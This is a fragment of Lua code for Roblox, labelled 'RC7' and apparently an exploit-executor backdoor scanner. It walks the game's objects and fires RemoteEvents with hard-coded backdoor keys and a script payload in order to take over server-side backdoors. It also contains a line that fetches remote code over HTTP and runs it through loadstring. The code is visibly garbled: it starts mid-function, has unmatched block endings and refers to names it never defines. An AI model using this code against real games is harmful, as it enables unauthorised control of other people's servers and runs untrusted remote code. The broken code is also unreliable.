RC7
RC7
now
local tableFind = table.find
local taskSpawn = task.spawn
local taskWait = task.wait
local stringRep = string.rep
local alternativeSS = {
run = { [1] = "5#lGIERKWEF" },
emma = { [1] = "pwojr8hoc0-gr0yxohlgp-0feb7ncxed", [2] = ",,,,,,,,,,,,,,," },
helpme = { [1] = "helpme" },
pickett = { [1] = "cGlja2V0dA==" }
}
if possibleWait then
local start = dateTimeNow().UnixTimestampMillis
local possibleWait = possibleWait * 1000
while PlayerGui and not PlayerGui:FindFirstChild("RC7 Injected!") and
(possibleWait > dateTimeNow().UnixTimestampMillis - start) do
taskWait()
end
end
if getgenv().blacklisted then
if tableFind(getgenv().blacklisted, rm:GetFullName()) then return false
end
end
if Parent then
if Parent == JointsService then return false end
if (Parent == ReplicatedStorage and rm:FindFirstChild("__FUNCTION")) or
(rm.Name == "__FUNCTION" and Parent.ClassName == "RemoteEvent"
and Parent.Parent == ReplicatedStorage) then return false end
end
return true
end
if harked() then
loadstring(httpRequest(alternativeSS.harked))()
return
end
do
local DescendantsList = game:GetDescendants()
for index=1, #DescendantsList do
if attached() then break end
local remote = DescendantsList[index]
if emmaBackdoor(remote) then
remote:FireServer(unpack(alternativeSS.emma),
requireScript)
end
if not attached() and runBackdoor(remote) then
remote:FireServer(unpack(alternativeSS.run), requireScript)
end
end
if attached() then return end
end
end
end
scanGame()
if game:IsLoaded() then
pcall(Main)
end